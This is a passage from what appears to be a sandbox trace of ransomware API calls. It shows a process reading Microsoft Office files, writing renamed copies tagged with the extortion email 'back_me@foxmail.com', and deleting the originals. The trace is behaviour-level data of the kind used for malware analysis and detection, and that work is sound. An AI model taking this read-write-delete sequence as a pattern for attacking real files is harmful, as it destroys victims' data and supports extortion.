[0251.601] lstrlenW (lpString="ACCDDSUI.DLL") returned 12 [0251.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0251.601] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=21424) returned 1 [0251.601] CloseHandle (hObject=0x210) returned 1 [0251.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll")) returned 0x20 [0251.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0251.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.603] lstrlenW (lpString=".doc") returned 4 [0251.603] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0251.603] lstrlenW (lpString=".docx") returned 5 [0251.603] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0251.603] lstrlenW (lpString=".pdf") returned 4 [0251.603] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0251.603] lstrlenW (lpString=".xls") returned 4 [0251.603] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0251.603] lstrlenW (lpString=".xlsx") returned 5 [0251.603] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0251.603] lstrlenW (lpString=".ppt") returned 4 [0251.603] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0251.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.603] lstrlenW (lpString=".zip") returned 4 [0251.603] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0251.603] lstrlenW (lpString=".rar") returned 4 [0251.603] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0251.603] lstrlenW (lpString=".bz2") returned 4 [0251.603] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0251.603] lstrlenW (lpString=".7z") returned 3 [0251.603] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0251.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.603] lstrlenW (lpString=".dbf") returned 4 [0251.603] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0251.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.603] lstrlenW (lpString=".1cd") returned 4 [0251.603] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0251.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.603] lstrlenW (lpString=".jpg") returned 4 [0251.603] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0251.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.604] lstrlenW (lpString=".doc") returned 4 [0251.604] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0251.604] lstrlenW (lpString=".docx") returned 5 [0251.604] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0251.604] lstrlenW (lpString=".pdf") returned 4 [0251.604] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0251.604] lstrlenW (lpString=".xls") returned 4 [0251.604] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0251.604] lstrlenW (lpString=".xlsx") returned 5 [0251.604] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0251.604] lstrlenW (lpString=".ppt") returned 4 [0251.604] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0251.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.604] lstrlenW (lpString=".zip") returned 4 [0251.604] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0251.604] lstrlenW (lpString=".rar") returned 4 [0251.604] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0251.604] lstrlenW (lpString=".bz2") returned 4 [0251.604] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0251.604] lstrlenW (lpString=".7z") returned 3 [0251.604] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0251.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.604] lstrlenW (lpString=".dbf") returned 4 [0251.604] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0251.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.604] lstrlenW (lpString=".1cd") returned 4 [0251.604] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0251.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0251.604] lstrlenW (lpString=".jpg") returned 4 [0251.604] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0251.605] lstrcmpiW (lpString1=".ACC", lpString2=".php") returned -1 [0251.605] lstrlenW (lpString="ACCESS12.ACC") returned 12 [0251.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0251.605] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=495616) returned 1 [0251.605] CloseHandle (hObject=0x210) returned 1 [0251.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc")) returned 0x20 [0251.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0251.605] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.605] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0251.617] GetLastError () returned 0x0 [0251.617] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x79000, lpOverlapped=0x0) returned 1 [0251.647] WriteFile (in: hFile=0x2e8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x79010, lpOverlapped=0x0) returned 1 [0251.814] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.814] WriteFile (in: hFile=0x2e8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0251.814] SetEndOfFile (hFile=0x2e8) returned 1 [0251.814] CloseHandle (hObject=0x2e8) returned 1 [0251.814] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.814] SetEndOfFile (hFile=0x210) returned 1 [0251.825] CloseHandle (hObject=0x210) returned 1 [0251.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.825] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc")) returned 1 [0251.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.825] lstrlenW (lpString=".doc") returned 4 [0251.825] lstrcmpiW (lpString1=".doc", lpString2=".ACC") returned 1 [0251.825] lstrlenW (lpString=".docx") returned 5 [0251.826] lstrcmpiW (lpString1=".docx", lpString2="2.ACC") returned -1 [0251.826] lstrlenW (lpString=".pdf") returned 4 [0251.826] lstrcmpiW (lpString1=".pdf", lpString2=".ACC") returned 1 [0251.826] lstrlenW (lpString=".xls") returned 4 [0251.826] lstrcmpiW (lpString1=".xls", lpString2=".ACC") returned 1 [0251.826] lstrlenW (lpString=".xlsx") returned 5 [0251.826] lstrcmpiW (lpString1=".xlsx", lpString2="2.ACC") returned -1 [0251.826] lstrlenW (lpString=".ppt") returned 4 [0251.826] lstrcmpiW (lpString1=".ppt", lpString2=".ACC") returned 1 [0251.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.826] lstrlenW (lpString=".zip") returned 4 [0251.826] lstrcmpiW (lpString1=".zip", lpString2=".ACC") returned 1 [0251.826] lstrlenW (lpString=".rar") returned 4 [0251.826] lstrcmpiW (lpString1=".rar", lpString2=".ACC") returned 1 [0251.826] lstrlenW (lpString=".bz2") returned 4 [0251.826] lstrcmpiW (lpString1=".bz2", lpString2=".ACC") returned 1 [0251.826] lstrlenW (lpString=".7z") returned 3 [0251.826] lstrcmpiW (lpString1=".7z", lpString2="ACC") returned -1 [0251.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.826] lstrlenW (lpString=".dbf") returned 4 [0251.826] lstrcmpiW (lpString1=".dbf", lpString2=".ACC") returned 1 [0251.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.826] lstrlenW (lpString=".1cd") returned 4 [0251.826] lstrcmpiW (lpString1=".1cd", lpString2=".ACC") returned -1 [0251.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.826] lstrlenW (lpString=".jpg") returned 4 [0251.826] lstrcmpiW (lpString1=".jpg", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.827] lstrlenW (lpString=".doc") returned 4 [0251.827] lstrcmpiW (lpString1=".doc", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString=".docx") returned 5 [0251.827] lstrcmpiW (lpString1=".docx", lpString2="2.ACC") returned -1 [0251.827] lstrlenW (lpString=".pdf") returned 4 [0251.827] lstrcmpiW (lpString1=".pdf", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString=".xls") returned 4 [0251.827] lstrcmpiW (lpString1=".xls", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString=".xlsx") returned 5 [0251.827] lstrcmpiW (lpString1=".xlsx", lpString2="2.ACC") returned -1 [0251.827] lstrlenW (lpString=".ppt") returned 4 [0251.827] lstrcmpiW (lpString1=".ppt", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.827] lstrlenW (lpString=".zip") returned 4 [0251.827] lstrcmpiW (lpString1=".zip", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString=".rar") returned 4 [0251.827] lstrcmpiW (lpString1=".rar", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString=".bz2") returned 4 [0251.827] lstrcmpiW (lpString1=".bz2", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString=".7z") returned 3 [0251.827] lstrcmpiW (lpString1=".7z", lpString2="ACC") returned -1 [0251.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.827] lstrlenW (lpString=".dbf") returned 4 [0251.827] lstrcmpiW (lpString1=".dbf", lpString2=".ACC") returned 1 [0251.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.827] lstrlenW (lpString=".1cd") returned 4 [0251.827] lstrcmpiW (lpString1=".1cd", lpString2=".ACC") returned -1 [0251.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0251.827] lstrlenW (lpString=".jpg") returned 4 [0251.827] lstrcmpiW (lpString1=".jpg", lpString2=".ACC") returned 1 [0251.828] lstrcmpiW (lpString1=".VSL", lpString2=".php") returned 1 [0251.828] lstrlenW (lpString="DBENGR.VSL") returned 10 [0251.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0251.829] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=53144) returned 1 [0251.829] CloseHandle (hObject=0x210) returned 1 [0251.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl")) returned 0x20 [0251.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0251.829] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.830] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0251.830] GetLastError () returned 0x0 [0251.830] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xcf98, lpOverlapped=0x0) returned 1 [0251.835] WriteFile (in: hFile=0x2e8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xcfa0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xcfa0, lpOverlapped=0x0) returned 1 [0251.837] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.837] WriteFile (in: hFile=0x2e8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0251.837] SetEndOfFile (hFile=0x2e8) returned 1 [0251.837] CloseHandle (hObject=0x2e8) returned 1 [0251.837] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.837] SetEndOfFile (hFile=0x210) returned 1 [0251.842] CloseHandle (hObject=0x210) returned 1 [0251.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.842] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl")) returned 1 [0251.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.842] lstrlenW (lpString=".doc") returned 4 [0251.842] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0251.842] lstrlenW (lpString=".docx") returned 5 [0251.842] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1 [0251.842] lstrlenW (lpString=".pdf") returned 4 [0251.842] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0251.842] lstrlenW (lpString=".xls") returned 4 [0251.842] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0251.842] lstrlenW (lpString=".xlsx") returned 5 [0251.842] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1 [0251.842] lstrlenW (lpString=".ppt") returned 4 [0251.843] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.843] lstrlenW (lpString=".zip") returned 4 [0251.843] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0251.843] lstrlenW (lpString=".rar") returned 4 [0251.843] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString=".bz2") returned 4 [0251.843] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString=".7z") returned 3 [0251.843] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0251.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.843] lstrlenW (lpString=".dbf") returned 4 [0251.843] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.843] lstrlenW (lpString=".1cd") returned 4 [0251.843] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.843] lstrlenW (lpString=".jpg") returned 4 [0251.843] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.843] lstrlenW (lpString=".doc") returned 4 [0251.843] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString=".docx") returned 5 [0251.843] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1 [0251.843] lstrlenW (lpString=".pdf") returned 4 [0251.843] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0251.843] lstrlenW (lpString=".xls") returned 4 [0251.843] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0251.843] lstrlenW (lpString=".xlsx") returned 5 [0251.843] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1 [0251.844] lstrlenW (lpString=".ppt") returned 4 [0251.844] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0251.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.844] lstrlenW (lpString=".zip") returned 4 [0251.844] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0251.844] lstrlenW (lpString=".rar") returned 4 [0251.844] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0251.844] lstrlenW (lpString=".bz2") returned 4 [0251.844] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0251.844] lstrlenW (lpString=".7z") returned 3 [0251.844] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0251.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.844] lstrlenW (lpString=".dbf") returned 4 [0251.844] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0251.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.844] lstrlenW (lpString=".1cd") returned 4 [0251.844] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0251.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0251.844] lstrlenW (lpString=".jpg") returned 4 [0251.844] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0251.844] lstrcmpiW (lpString1=".VSL", lpString2=".php") returned 1 [0251.844] lstrlenW (lpString="DBWIZ.VSL") returned 9 [0251.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0251.845] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=164216) returned 1 [0251.845] CloseHandle (hObject=0x210) returned 1 [0251.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl")) returned 0x20 [0251.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0251.846] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.846] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0251.846] GetLastError () returned 0x0 [0251.855] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x28178, lpOverlapped=0x0) returned 1 [0251.864] WriteFile (in: hFile=0x2e8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x28180, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x28180, lpOverlapped=0x0) returned 1 [0251.868] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.868] WriteFile (in: hFile=0x2e8, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0251.868] SetEndOfFile (hFile=0x2e8) returned 1 [0251.868] CloseHandle (hObject=0x2e8) returned 1 [0251.868] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.868] SetEndOfFile (hFile=0x210) returned 1 [0251.873] CloseHandle (hObject=0x210) returned 1 [0251.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.874] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl")) returned 1 [0251.874] lstrlenW (lpString="C:\\Program 